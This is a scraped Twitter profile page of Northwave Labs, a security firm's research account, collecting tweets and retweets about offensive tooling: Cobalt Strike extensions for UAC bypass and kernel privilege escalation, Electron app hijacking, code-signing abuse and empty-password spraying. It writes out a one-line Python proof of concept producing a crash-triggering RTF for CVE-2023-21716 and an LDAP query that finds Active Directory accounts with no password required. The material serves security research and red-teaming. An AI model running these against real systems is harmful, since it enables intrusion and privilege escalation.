Northwave Labs

53 posts

Northwave Labs banner
Northwave Labs

Northwave Labs

@NorthwaveLabs

Official Twitter account of the RED, BLUE, CERT & RE teams of Northwave Cyber Security. Sending tweets into the cybernetic universe.

Katılım Mart 2020
131 Takip Edilen271 Takipçiler
Northwave Labs
Northwave Labs@NorthwaveLabs·
As the icing on the cake, they shared the complete functional exploit with @OutflankNL for utilisation by their Outflank Security Tooling (OST) customers, enhancing global cyber resilience! (2/2)
English
0
0
1
223
Northwave Labs retweetledi
Outflank
Outflank@OutflankNL·
New offensive trade-craft added to OST: hijacks for Electron apps. This evasion technique is primarily useful for persistence. Our implementation was inspired upon work done by the @NorthwaveLabs team.
Outflank tweet media
English
0
8
48
5K
Northwave Labs retweetledi
Tijme Gommers
Tijme Gommers@tijme·
I dived into exploiting leaked code signing certificates to sign malware ✍. A technique that has been actively abused in the wild by threat actors for a long time. Blog post: tij.me/blog/finding-a…
Tijme Gommers tweet media
English
3
51
144
15.8K
Northwave Labs retweetledi
Joshua J. Drake
Joshua J. Drake@jduck·
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
English
19
240
838
226K
Northwave Labs retweetledi
Tijme Gommers
Tijme Gommers@tijme·
Cobalt Strike BOF that utilises AMD's Ryzen Master kernel driver to read and write physical memory. It currently escalates privileges from administrator to SYSTEM. Future goal is to add features such as disabling EDR, disabling ETW TI or dumping LSASS. github.com/tijme/amd-ryze…
English
4
151
359
39.3K
Northwave Labs
Northwave Labs@NorthwaveLabs·
Northwave has conducted research into the psychological effects of a ransomware crisis on people involved in mitigating a ransomware attack. The findings reveal the deep marks that a ransomware crisis leaves on all those affected. northwave-security.com/wp-content/upl…
English
1
4
5
0
Northwave Labs retweetledi
Tijme Gommers
Tijme Gommers@tijme·
Cobalt Strike BOF to bypass UAC via the CMSTPLUA COM interface. It masquerades PEB and utilises COM Elevation Moniker on the CMSTPLUA COM object to execute commands in an elevated context. github.com/tijme/cmstplua…
English
0
14
24
0
Northwave Labs retweetledi
5pider
5pider@C5pider·
90% of my Twitter DMs are asking me about how to start getting into Malware development. Well, I love answering them but it's easier to write a small thread about it so here we go. 1/12
English
112
890
3.2K
0
Northwave Labs
Northwave Labs@NorthwaveLabs·
Cobalt Strike BOF foundation for kernel exploitation using CVE-2021-21551. In its current state, as a PoC, it overwrites the beacon token with the system token (privesc). github.com/NorthwaveSecur…
English
0
48
108
0
Northwave Labs retweetledi
Rich Warren
Rich Warren@buffaloverflow·
Windows 11 (May) + Office Pro Plus (April) + Preview pane enabled
English
3
61
191
0
Northwave Labs retweetledi
nao_sec
nao_sec@nao_sec·
Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. virustotal.com/gui/file/4a240…
nao_sec tweet media
English
40
602
1.6K
0
Northwave Labs retweetledi
Northwave. Intelligent Security Operations.
NW’s specialists examined #Conti's internal conversations, released during the recent #leak. Extensive analysis resulted in findings never published before, from IP addresses to the method of determining the actors’ real identities. Access full blog here: #source" target="_blank" rel="nofollow noopener">northwave-security.com/when-the-hacke…
English
1
1
6
0
Northwave Labs
Northwave Labs@NorthwaveLabs·
Search for AD accounts with the "PASSWD_NOTREQD" flag in CobaltStrike: ldapsearch (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) cn
English
1
1
8
0
Northwave Labs
Northwave Labs@NorthwaveLabs·
While this may sound too simple, we've managed to escalate across domains on several occasions by accounts with blank passwords 🔥! In this blog we describe how it works, and which popular spraying tools we've updated to support empty password spraying: northwave-security.com/abusing-empty-…
English
1
12
23
0